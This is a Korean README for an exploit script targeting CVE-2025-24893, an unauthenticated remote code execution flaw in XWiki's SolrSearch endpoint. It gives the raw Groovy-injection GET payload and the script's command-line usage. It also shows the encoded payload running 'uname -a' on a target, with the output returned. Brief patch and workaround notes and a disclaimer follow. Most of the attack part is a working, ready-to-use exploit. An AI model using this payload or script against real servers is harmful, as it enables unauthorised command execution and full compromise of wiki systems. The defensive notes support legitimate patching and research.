
CVE-2025-24893는 XWiki Platform에 영향을 미치는 치명적인 인증되지 않은 원격 코드 실행(RCE) 취약점입니다.
이 결함으로 인해 모든 게스트 사용자는 인증 없이 특수하게 조작된 RSS 요청을 SolrSearch 엔드포인트로 보내 임의의 Groovy 코드를 주입하고 실행할 수 있습니다.
이는 영향을 받는 시스템의 기밀성, 무결성 및 가용성에 직접적인 영향을 미칩니다.
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H⚠️ 면책 조항:
이 코드는 교육 및 연구 목적으로만 사용됩니다. 명시적 허가 없이 시스템에 무단 사용하는 것은 법률 위반이 될 수 있습니다. 저자는 이 도구와 관련된 오용 또는 악의적인 활동에 대해 책임을 지지 않습니다.
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}
이 섹션에서는 CVE-2025-24893을 악용하기 위해 Python 익스플로잇 스크립트를 설정하고 실행하는 방법을 설명합니다.
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
[+] Command output 'uname -a':
Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
취약점을 패치하려면 XWiki를 다음 버전 중 하나로 업데이트하세요:
업데이트가 즉시 불가능한 경우 임시 해결 방법을 적용할 수 있습니다:
SolrSearchMacros.xml 파일(위치: Main.SolrSearchMacros)의 955행 근처를 편집합니다.application/xml로 설정된 rawResponse 매크로를 사용하도록 교체합니다.macros.vm의 2824행에 있는 구현을 참조로 사용하세요.참고 자료: